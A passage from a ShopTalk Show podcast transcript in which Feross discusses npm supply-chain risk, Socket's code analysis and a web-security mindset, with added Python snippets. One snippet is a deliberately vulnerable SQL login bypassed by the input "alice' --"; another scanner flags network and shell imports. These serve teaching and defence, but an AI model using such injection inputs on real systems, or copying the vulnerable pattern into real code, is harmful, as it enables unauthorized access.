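            # Assumes exact pinned versions; ranges like ^1.0.0 are not handled.
            if version in KNOWN_VULNERABLE.get(name, set()):
                findings.append((name, version))
    return findings


manifest_text = json.dumps({
    "dependencies": {"example-parser": "1.0.1", "left-alone": "4.2.0"},
    "devDependencies": {"example-server": "2.4.0"},
})
print(find_known_vulnerable(manifest_text))
```

Note that nothing here reads the package's code. It is a lookup against a list, which is the limitation being discussed.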

Chris: Right.

Feross: And they've done other things. They've made it -- you know they have different integrations with different tools and all this kind of stuff that people are paying -- that's what people are paying for.

But at the end of the day, it's pretty similar to Dependabot and it'll send you pull requests when you have a known vulnerability.

Dave: Yeah.

Feross: And that's pretty much what it does. It does not do the stuff that Socket does where we actually analyze the code.

What we do, we have to download every NPM package, and we have to run an analysis on it, and we have to figure out what it's doing. None of these other tools do that. They just tell you whether it has any issues in this database.

Chris: That's so cool.

00:34:27

[Banjo music starts]

Chris: This episode of ShopTalk Show is brought to you in part by Notion. Learn more and get started for free at notion.com/codepen. That's notion.com/codepen to help you take the first step towards an organized, happier team today. That again is notion.com/codepen. I know this is ShopTalk Show and not CodePen Radio, but that's the URL we got just to keep all them clicks all consolidated for this overall sponsorship.

Notion is the best. As you know, I have done videos about how we use Notion. We've talked about Notion a ton on CodePen Radio and ShopTalk Show. It's a phenomenal software product.

In my opinion, it really changed the game and kind of invented a new category of knowledge management app, which is kind of how I think of it. But it's an app that's really at the core of running any kind of business, but probably mostly software technology businesses because that's where my brain is at.

It helps you plan projects and have shared calendars and have shared meeting notes. What you can do with it is really open-ended in the best possible way. Everything you make is a database or a document, and it's all nested and has good permissions levels and stuff.

I know I'm speaking very abstractly here, but once you get into using it, you're going to find it very natural and comfortable to use, especially in a team setting. And it just really brings people together. I have no doubt that it's made us a better place to work. At the places, the businesses, I've incorporated Notion into there, it's like Notion is where the work happens a lot of times, and I really love that.

I also want to say one thing about how I appreciate how they get the details right at Notion as a company. For example, for a long time, anybody asked us, "Where is the API? Where is the API?" for years and years and years. Finally, they're like, "Here's the API," and it's super well done, and it's well documented. It has good default integrations. It's just a super well-done API to the point where people were just like, "Um... Thanks. That's perfect, actually. Great." You know?

And then they took a bunch of time to get even a little detail about how text is selected across blocks in the document editor. It just underwent this great improvement of how you can select text across them. It feels just like you're selecting text in a natural way that you'd expect in any text editor, which was different before because of the block nature of editing.

A little hard to describe, but if you don't notice it, well, that's what they wanted. They didn't want you to be like, "Ew... Why is text selection weird in here?" which it kind of used to be a little bit. And now it's just better, and I appreciate that we're going to spend time on that detail. Not on necessarily some big flashy thing, but just on getting the experience of using the app good.

Thanks for the support, Notion.

[Banjo music stops]

00:37:24

Dave: So then Socket, where does it sit in my workflow? It's on NPM install or is it on--? I know there's a GitHub integration, so is it just living in GitHub? Where does it fit into my workflow?

Feross: Right now it's just on GitHub, so it will watch your PRs. We're also working on--

Because you're making a good point here, which is -- or I think you're making this point, which is when you run NPM install, you want to protect your own computer too. You don't want to wait until it gets on GitHub for us to tell you that, hey, this dependency is actually doing something sketchy. So, we want to protect your local, like when you run NPM install as well.

This month and next month, we're working on this new thing that we're calling right now Safe NPM, which is going to be a thing you can use to intercept your NPM installs.

Chris: Hmm...

Feross: When you run NPM install, we can actually sort of give you kind of a report card almost of here's what this package is going to do. Do you want to proceed: yes, no?

It's just one extra little step in your NPM install workflow, and it'll help to catch stuff before it even affects your own computer, so you don't have to wait until the GitHub pull request is sent to catch that.

Dave: Nice.

Chris: Interesting. It made me think of why is it that we execute all this stuff kind of at this root terminal level at all? Is that dumb? Is there a world in which we all containerize everything we do on NPM?

00:39:04

Feross: I don't know why Docker hasn't taken off more. Maybe it's just too annoying to use or something. But yeah, it's crazy that you want to build a website, so you have to run NPM install. Then that package that you haven't read the code for is going to get the ability to read and write your entire hard drive.

Chris: [Laughter]

Feross: It can literally delete your whole photo library, for example, if it wanted to.

Dave: Love is trust.

Feross: [Laughter]

Chris: [Laughter]

Dave: If you love something, you give it access to your full hard drive. I think that's just basic science. [Laughter]

Chris: Well, I guess it works in your favor temporarily. This is risky business, so use Socket.

Feross: No, I mean I want to solve the problem. I'm not just trying to sell Socket here.

Chris: Yeah, I know. I know.

Dave: No, no, well, it's interesting, too, just the different places where you want. Like when I'm NPM installing, I kind of want to make sure I didn't do it bad. Then when I PR, I want to make sure I didn't do it bad. Then maybe even in deploy or something, what gets installed there isn't bad either.

But I'm just thinking about all the things we want to do there. It's like I want to lint my code locally. Then I want to lint it on PR, and then I want to lint it on build or run my tests or check accessibility or check performance. You want all these checkpoints to happen all the time. It's just an interesting world, I guess, we live in from a development standpoint. It's like you always want to be checking always everywhere at every single -- [laughter] -- at every single keystroke, you want to check.

Feross: Mm-hmm.

Chris: Yeah. It also makes me think, like, I don't know. Can I run a version of NPM that doesn't allow anybody to have any scripts that auto-run?

Feross: Yeah. Yeah, you can. Well, you can pass a flag when you run NPM install. I think it's --ignore lifecycle -- or something like that. Let me see here.

Chris: Nice. I should look at that. That one in particular bugs me.

Feross: Yeah, you can even make it the default. I think you can put it in your configuration for NPM, and then it'll never run install scripts.

Chris: Yeah. I wonder what that breaks.

Feross: It does break stuff.

Chris: I like using them, personally. We have one in our repo that's like -- you know because the vibe of Git is that you generally don't commit your build artifacts, right? We have a repo of icons, and these SVG icons, because our React project grabs an SVG icon and it turns it into a little JSX component thing. But we don't commit those because those are just built things. The SVG is the more authored code, in a way. So, everybody has this - I don't know - post install script or whatever that when you pull the repo, if there's any new SVGs, it builds them. Pretty useful, but that's our own code. You know? You don't get to do that.

00:42:19

Feross: Yeah. No, I think there is a library that I'm forgetting the name of now, but there's a way to basically have an allow list of packages that you want to give the permission to run install scripts to. But then by default, it doesn't run them. You can use that to kind of jerry-rig--

You can make it so that, yeah, you control what actually gets to run an install script.

Chris: That's cool. It's just to extend things a little bit. You mentioned that you teach Web security at Stanford, so you have some class of kids. Is that where you went, by the way? Are you an alum that's now teaching the same program that you went through?

Feross: Yeah. Yeah, so I did undergrad there and then, after working on open source pretty much full time since graduating, I wanted to go back to get my master's, and so I went back in 2018, and I was really interested in security, so I took all these cryptography classes and networking classes and just got really interested in going deep on security.

Then when I was there, I asked one of the professors who taught Web security, like, "Why don't you guys teach this anymore? That was my favorite class in undergrad," and they said that they're teaching cryptocurrency now instead of Web security, [laughter] and so I was like, "Oh, well that seems -- I mean, okay. I guess that's cool, but can we also have a Web security class because that seems pretty important to me?"

And they said, "Well, if you teach it then we can add it back," and I said, "Okay. That sounds pretty fun," and so I went and updated the course, which hadn't been taught since 2011, and updated it for the modern Web because a lot has changed since 2011.

That was pretty fun, and I put all the videos online so people can look at them now and watch them. I think a ton of people have watched them on YouTube. If you search Stanford Web Security or CS253, it has, yeah, tens of thousands.

Chris: It always blows my mind that colleges do that. It seems like your most valuable thing, the most valuable thing of college is the courses themselves, and so many colleges are just like, "Nah, whatever. Just put it on YouTube." Apparently, it doesn't--

Maybe it helps get students through the door. I don't know.

Dave: I love it. I don't know. Let's democratize the information as much as possible. We really need to.

Chris: Oh, yeah. I love it too.

Dave: But yeah, it is wild. A university who pays you to make this is also just like, "Sure, put it up on YouTube."

Chris: Yeah.

Dave: Web security is a big topic. What's the first thing you think people need to know?

Chris: Exactly! What are you teaching these kids? [Laughter]

Dave: Even myself, I learned this stuff way late, and I have nonce because that's what I was told to do. You know?

Feross: [Laughter]

Dave: So, yeah, what do people need to kind of know to get started?

00:45:31

Feross: I think the most important thing is not any specific piece of knowledge but more about the mindset that you need to bring to your programming. Thinking like an attacker is the most important thing.

When you're writing code, you need to have in your mind this adversary who is going to try to break your code. As you're writing, like if you're writing a function, you have to imagine what would happen if someone passed in an argument of a different type or an argument that was longer than you expected, or something that was completely random text instead of the format you were looking for.

These kinds of things, you have to be thinking about as you're writing the code because, really, at every stage of the process, you need to think about security throughout the process. When you've done it long enough, it becomes a background process that just runs in your mind, which is like, "Okay, how could someone break this? How could someone trick me, or how could someone make this function crash? How could someone cause this to throw an exception?"

The cool thing about that mindset is it helps you more than just in writing secure code. It also helps you write better code because if you're thinking about how this could crash or what could be a condition, an error condition here that I didn't expect, you're going to end up writing better code because you're going to catch that exception. You're going to handle that case. It's not going to just throw a random exception in the middle of the function because it's something that happened that you didn't expect.
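To make the "different type, longer than expected, completely random text" cases concrete, here is a small Python sketch of a function that checks each of them before trusting its input. The function name, the 32-character limit, and the allowed character set are assumptions chosen for illustration, not anything specified in the episode.

```python
import re

MAX_USERNAME_LENGTH = 32  # illustrative limit, not from the episode
USERNAME_PATTERN = re.compile(r"[a-z0-9_]+")  # illustrative format


def normalize_username(value):
    """Validate an untrusted username and return it, or raise ValueError."""
    # Case 1: an argument of a different type than expected.
    if not isinstance(value, str):
        raise ValueError("username must be a string")
    # Case 2: an argument that is empty or longer than expected.
    if not 1 <= len(value) <= MAX_USERNAME_LENGTH:
        raise ValueError("username has an unexpected length")
    # Case 3: text that does not match the expected format.
    if USERNAME_PATTERN.fullmatch(value) is None:
        raise ValueError("username contains unexpected characters")
    return value


for candidate in ["feross", 42, "a" * 1000, "bob'; DROP TABLE users;--"]:
    try:
        print("accepted:", normalize_username(candidate))
    except ValueError as error:
        print("rejected:", error)
```

Each surprising input hits a handled error instead of an unexpected exception deeper in the function.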

You're going to end up being a little bit more defensive in how you write things, and so I think that that's something that if you have that mindset, you'll end up asking the right questions and digging into the right things and learning what you need to learn to make your code really good. You don't need to know some specific list of things as much as just being afraid of--

Chris: That's interesting. It's like a philosophy more so than, like, "Okay, kids. This is what an SQL injection attack looks like."

Feross: Mm-hmm.

Chris: You know?

Feross: Yeah, because if you--

Chris: That's too specific?

Feross: If you think about the SQL injection example you just gave, what is going on there? It's that you wrote this code and you didn't think that that input could be different than what you thought it should be. Right? And so, it all comes back to the same thing where the attacker surprised you in some way. Right? And so, it's about, like--

And if you think of it from the other perspective, if you were an attacker and you're trying to break something -- which is kind of fun to do, by the way. I recommend breaking things. It's fun. What are you trying to do? You're trying to find a difference between the written rules of the system and the actual rules of the system.

So, the written rules are, okay, you have a log-in form. You're supposed to be able to type in a username and a password and log in. Right? But the actual rules of the system might be that you can put some SQL into the username field, and that'll actually get added to the SQL query, and it'll do a SQL injection. Right?
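The log-in example can be reproduced with Python's built-in `sqlite3` module. This is a sketch for illustration only: the table, the function names, and the plain-text password are assumptions (a real system would store password hashes), but it shows the gap between the written rules and the actual rules.

```python
import sqlite3

connection = sqlite3.connect(":memory:")
connection.execute("CREATE TABLE users (username TEXT, password TEXT)")
# Plain-text password only to keep the sketch short; real systems store hashes.
connection.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")


def login_unsafe(username, password):
    # Vulnerable: user input is pasted straight into the SQL text.
    query = (
        "SELECT COUNT(*) FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return connection.execute(query).fetchone()[0] > 0


def login_safe(username, password):
    # Parameterized: values travel separately from the SQL text.
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return connection.execute(query, (username, password)).fetchone()[0] > 0


attack = "alice' --"  # closes the string, then comments out the password check
print("unsafe login succeeds:", login_unsafe(attack, "wrong"))
print("safe login succeeds:", login_safe(attack, "wrong"))
```

With the string-built query, the attacker logs in as alice without the password. With placeholders, the same input is treated as an odd username that matches nothing.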

Chris: Hmm...

Feross: You're trying to find this gap between what they were trying to do and what you can actually do. And so, that's the thing you have to constantly be asking yourself when you're coding is what can someone do if they were really evil here? It's totally a mindset thing.

Dave: Do tools like -- I don't know. I'm just saying stuff -- but Metasploit and all these, there are tools you can use to automate an attacker on your site, right? Is that something we should all know how to use, just like how we all know how to use a screen reader? Is that something we should know how to use or be familiar with? Is that just overkill?

00:49:06

Feross: I personally think that's overkill. I think being familiar with what the features of your Web framework that you're using are and whether it covers a bunch of the common security things out of the box, like knowing that kind of stuff is more important. Fortunately, a lot of stuff today does the right thing for you by default, so you have to really go out of your way to do something wrong these days.

Like in React for example. You can't do an XSS on yourself unless you go out of your way to use dangerouslySetInnerHTML. Right? It has "dangerously" right there in the name, so you've got to know when you're doing that.

Chris: My favorite part of that API is not only that but you have to pass it this awkward object with double underscore HTML in it. Even when I think about it and then I remember I have to craft an object just so, too, I'm like, "Ah, you're right. I'll do it the right way, God damn it."

Feross: [Laughter]

Chris: It really forces you to not use it.

Feross: Yeah. No, making hard things or dangerous things a little bit harder to do and making you think twice is actually a really important part of good API design. In other templating languages that I've used, they'll do things like two curly braces substitutes in something safely, but then three curly braces substitutes it in unsafely, and so--

Chris: Unsafely, yeah.

Feross: Yeah, and you're looking at the code. If you're looking at a pull request that someone on your team sent, are you going to really notice the difference between two and three?

Chris: No. No.

Feross: Unless you're really looking carefully. Yeah.
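The two-versus-three curly brace convention can be sketched with a toy renderer in Python. This is not the implementation of any real templating library; `render` and its regular expression are hypothetical and only show how little the source text differs between the safe and unsafe forms.

```python
import html
import re

# Matches {{{name}}} (raw) or {{name}} (escaped); the triple form is tried first.
PLACEHOLDER = re.compile(r"\{\{\{(\w+)\}\}\}|\{\{(\w+)\}\}")


def render(template, values):
    """Substitute placeholders, escaping HTML only for the two-brace form."""
    def substitute(match):
        raw_name, escaped_name = match.group(1), match.group(2)
        if raw_name is not None:
            return str(values[raw_name])  # inserted as-is: unsafe
        return html.escape(str(values[escaped_name]))  # HTML-escaped: safe
    return PLACEHOLDER.sub(substitute, template)


values = {"comment": "<script>alert(1)</script>"}
print(render("<p>{{comment}}</p>", values))
print(render("<p>{{{comment}}}</p>", values))
```

The two template strings differ by a single pair of braces, which is easy to miss in a pull request, while a name like `dangerouslySetInnerHTML` is hard to overlook.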

Dave: Mm-hmm.

Chris: I submitted a PR with that exact change just recently, and it was to make it less secure, ironically, because I wanted anchor links in a paragraph in an email and I was using Postmark, which is like an email sending service, and their little Postmark language for templating emails, that's exactly the syntax they use. Without the triple brackets, you know, but who knows what I was introducing.

Feross: Mm-hmm.

Chris: Probably some horrible exploit, but fortunately, hopefully, only we hit those endpoints. You know? [Laughter] I don't know. I maybe self-owned us a little bit.

I'm curious what you think about -- I know we're kind of butting up against the end -- typed languages or things like that that are like, "If I do this, it makes it harder to write bad or broken, exploitable code because the language itself is forcing me to do the right stuff."

00:51:46

Feross: Yeah. I mean I avoided TypeScript for years because I didn't want to introduce a build step. I don't know. I guess I just have this hope that one day we'll be able to get rid of build steps entirely and just write code to the Web platforms.

Chris: Zero dependencies. I just mean like when you said TypeScript had like 1,500 dependencies -- or not TypeScript. Create React App or whatever it was. I immediately thought of, like, "Well, yeah, but how many dependencies does writing HTML, CSS, and JavaScript just raw as individual files have?" They have none, right?

Feross: Mm-hmm.

Chris: It's a very distant path between those two things, weirdly.

Feross: Mm-hmm.

Chris: The further we can pull it back one way, maybe that's good.

Feross: That's how I feel. Yeah, I would love us to get to a world where we can get rid of these build steps and this complexity as much as possible and just put more of this stuff into the Web platform, and so we can have lighter-weight dependencies.

But no, so that's why I've been avoiding, was avoiding, TypeScript for a long time in my career. But I do think it really helps when you're working on a team with other people. The types actually do catch quite a few bugs. And they catch it at compile time instead of at runtime, and so it's actually been quite useful. We're using it at Socket now, and I do think it can help.

The only kind of downside is it's a build step. It's kind of slow, and it also has a little bit of cruft around getting everything set up correctly. You have to have configurations and stuff. So, I haven't been really using it in my open-source projects because I don't really want to do all that ceremony in every single package.

Chris: Yeah. Yeah, fair enough.

Feross: But I do think it can really help.

I also think if you don't want to use TypeScript, you should use a linter at the very least. ESLint is great, and it actually catches more than -- you know it's for more than just style. It actually catches bugs. It actually catches, like, "Hey, you're using a variable that you didn't declare. You should probably declare your variables before you try to use them." That kind of stuff, you want to catch that as early as possible and not at runtime.

That's pretty lightweight. That doesn't add anything to your website. It doesn't go into your bundle.

Chris: Right. Right.

Feross: Everyone should be using a linter.

Chris: What I'm curious about is the connection between that mindset you were talking about of, "I'm a bad guy and I'm going to call this function, for example, with horrible parameters, extra parameters, or weird strings, or whatever." TypeScript is for you, but it's not real, right?

It eventually turns into JavaScript. So, if that function is public in any way, you can't call your own function in TypeScript with totally wrong parameters because TypeScript will be like, "Man, no!" But eventually, that turns into JavaScript in which that protection no longer exists, right?

It might lure you into this sense that you can't pass this function attacker-like stuff. It doesn't work. But you're like, "Yeah, but it does work once it's public."

Feross: Yeah, you're totally right. You're totally right. Yeah.

Chris: [Laughter]

Feross: That might lure a lot of people into a false sense of security.

Chris: I'm not sure. I just had that thought whereas a typed language that's actually typed, you can't, right? Because the language itself will be mad at you and not accept that stuff.

I'm curious of one more thing. You have to do this analysis, so feel free to stop short of giving away your amazing trade secrets or whatever. But you said you have to download all of NPM to decide what's happening, essentially, and every update too, which is, I'm sure, not a trivial task to get done - some kind of fancy watcher code and who knows - cron jobs out the wazoo.

But then you get this thing. Are you--? What, for example, are you doing? Do you run a diff to see how much has changed? Do you analyze it completely fresh each time? Are you turning stuff into ASTs and rooting through the ASTs to find gnarly stuff, or is it just string analysis? I'm just curious what kind of stuff you're doing to get this cool data.

00:55:58

Feross: Yeah, so it's all AST-based for the most part. We analyze the source code through analyzing the AST and look for the specific things that are bad or that we want to raise issues on.
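To show what AST-based analysis buys over plain string matching, here is a loose analogue using Python's built-in `ast` module on Python source. Socket analyzes JavaScript packages and its actual rules are not described in the episode, so the module list and the `find_risky_imports` function are assumptions made purely for illustration.

```python
import ast

# Illustrative categories; this mapping is an assumption for the sketch.
RISKY_MODULES = {
    "socket": "network access",
    "urllib": "network access",
    "subprocess": "shell usage",
}


def find_risky_imports(source):
    """Walk the syntax tree and report (line, module, reason) for risky imports."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom) and node.module:
            names = [node.module]
        else:
            continue
        for name in names:
            top_level = name.split(".")[0]
            if top_level in RISKY_MODULES:
                findings.append((node.lineno, top_level, RISKY_MODULES[top_level]))
    return sorted(findings)


sample = '''
import json
import subprocess
from urllib.request import urlopen
text = "import socket"  # a string, not an import; an AST walk ignores it
'''
print(find_risky_imports(sample))
```

A string search for "import socket" would flag the last line of the sample. Walking the tree reports only the two real imports.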

We try to figure out the source of each of the issues so that when a new version comes out, if that issue is still present but it's the same instance of it, we can avoid warning you again about it because it's not being newly introduced in that version. It's actually just the same thing that was there before.

We actually need to kind of track. It's almost like git diff where Git tries to -- or when you move something around within a file, sometimes it can tell that it's the same block of code just moved rather than that it's been deleted and written out again.
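One way to picture "the same instance of an issue" across versions is a fingerprint that ignores where the code sits in the file. The Python sketch below is a guess at the general idea, not Socket's method: the issue dictionaries, the `fingerprint` scheme, and the function names are all hypothetical.

```python
import hashlib


def fingerprint(issue):
    """Identify an issue by its kind and code, ignoring its line number."""
    normalized = issue["code"].strip()
    digest = hashlib.sha256(f'{issue["kind"]}:{normalized}'.encode("utf-8"))
    return digest.hexdigest()


def newly_introduced(previous_issues, current_issues):
    """Return only issues whose fingerprint was absent from the previous version."""
    seen = {fingerprint(issue) for issue in previous_issues}
    return [issue for issue in current_issues if fingerprint(issue) not in seen]


version_1 = [{"kind": "shell", "line": 10, "code": "exec('ls')"}]
version_2 = [
    {"kind": "shell", "line": 42, "code": "    exec('ls')"},  # moved and re-indented
    {"kind": "network", "line": 7, "code": "fetch(url)"},     # genuinely new
]
print([issue["kind"] for issue in newly_introduced(version_1, version_2)])
```

Only the network issue is reported for the second version, because the shell call is the same code that was already flagged, just at a different line.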

Chris: Oh, clever. Right.

Feross: Yeah.

Chris: Because your goal is noise reduction, which is like a pretty excellent product choice, I think. The minute you start being obnoxious is the minute people start uninstalling your thing.

The big question, though, is did you write it in Zig? It seems like all the hot stuff is Zig-based.

Dave: Zig is--

Chris: [Laughter]

Chris: It's the new Rust.

Dave: --based on Pig and it's fast, I guess.

Chris: [Laughter] No. But you do have to make--

I'm maybe curious what you actually wrote it in because speed, you'd think, would be of the essence on analyzing all of NPM every day, or whatever you do. Or is it just JavaScript?

00:57:33

Feross: It's just JavaScript. We kind of made our own kind of analysis pipeline thing, so what it can do is it can avoid duplicating work. So, we have this thing where, once we've analyzed the package, certain parts of that analysis never need to happen again if the code hasn't changed or our analysis hasn't -- our code for analyzing it hasn't changed. And so, that stuff can get cached forever.

And then other stuff that involves the data coming from the GitHub API, like around who the maintainers are, how many stars this thing has, or how many downloads this thing has, that kind of stuff, we want to refresh that regularly, so certain analyses actually have a TTL, like a time to live, so that that stuff actually does periodically get reevaluated.

Chris: Hmm....

Feross: But some of the most heavy stuff is actually cached forever because if the code doesn't change, we don't need to do that analysis again.
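The two caching behaviors described here, results kept forever while the code and the analyzer are unchanged, and metadata refreshed after a time to live, can be sketched as follows. Socket's pipeline is written in JavaScript and its details are not given in the episode, so this Python version, including `ANALYZER_VERSION`, the cache layout, and the one-hour default TTL, is an assumption for illustration.

```python
import hashlib
import time

ANALYZER_VERSION = "1"  # hypothetical; bump when the analysis code changes

code_cache = {}      # (code hash, analyzer version) -> result, kept forever
metadata_cache = {}  # package name -> (expiry time, result), refreshed after a TTL


def analyze_code(source, analyze):
    """Run the expensive analysis once per unique (code, analyzer version) pair."""
    key = (hashlib.sha256(source.encode("utf-8")).hexdigest(), ANALYZER_VERSION)
    if key not in code_cache:
        code_cache[key] = analyze(source)
    return code_cache[key]


def fetch_metadata(name, fetch, ttl_seconds=3600, now=time.monotonic):
    """Return cached metadata until it is older than ttl_seconds, then refetch."""
    entry = metadata_cache.get(name)
    current = now()
    if entry is None or entry[0] <= current:
        entry = (current + ttl_seconds, fetch(name))
        metadata_cache[name] = entry
    return entry[1]


calls = []


def slow_analysis(source):
    calls.append(source)  # record each real run of the expensive step
    return {"length": len(source)}


analyze_code("console.log(1)", slow_analysis)
analyze_code("console.log(1)", slow_analysis)  # served from the cache
print("expensive analyses run:", len(calls))
```

Keying the permanent cache on both the code hash and the analyzer version means a change to either one triggers a fresh analysis, while star counts and download numbers simply expire on a timer.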

Chris: I suppose, yeah because what's a crazy package? Something like the headless Chromium or whatever, right? It's a billion files. Do you have to have a blacklist for stuff like that and be like, "We're going to check all the packages except that one"?

Feross: [Laughter] No, we do analyze all of them, including that. Yeah, we're just throwing a lot of servers at it. [Laughter]

Chris: [Laughter] Nice. All right. Any final thoughts, Dave?

Dave: No, this has been cool to think about. Yeah. I think the more and more, too, I think Chris and I both are doing a bit more Node-y work, right? And so, the more you start doing that, the more it's like you get more errors and stuff.

It's like you said. There's this big signal noise, so it's hard to figure out what I need to pay attention to. It sounds like you're working on that problem, and that's awesome.

Feross: Mm-hmm.

Dave: Thank you for coming on the show today. For people who aren't following you and giving you money, how can they do that?

Feross: [Laughter] The URL for Socket is socket.dev, and it's free to use the website to look up packages, and it's also free to install the GitHub app and get your repos protected.

At some point, we will charge for private repos using it, but right now it's free while we're in beta.

Yeah, if people want to email me or reach out to me, my URL is feross.org, and I'm also @feross on Twitter. F-E-R-O-S-S.

Dave: All right. Well, thank you, Feross. Thank you, dear listener, for downloading this in your podcatcher of choice. Be sure to star, heart, favorite it up. That's how people find out about the show.

Feross: [Laughter]

Dave: And then we have YouTube. I think we're going to kick that back up again, so youtube.com/shoptalkshow.

Chris: Oh, yeah.

Dave: And then head over to -- what's the -- D-d-d-d-discord.

Chris: Patreon? There you go.

Dave: Patreon.com/shoptalkshow. We're having fun in there.

Chris: Come on in. There you go.

Dave: Chris, do you got anything else you'd like to say?
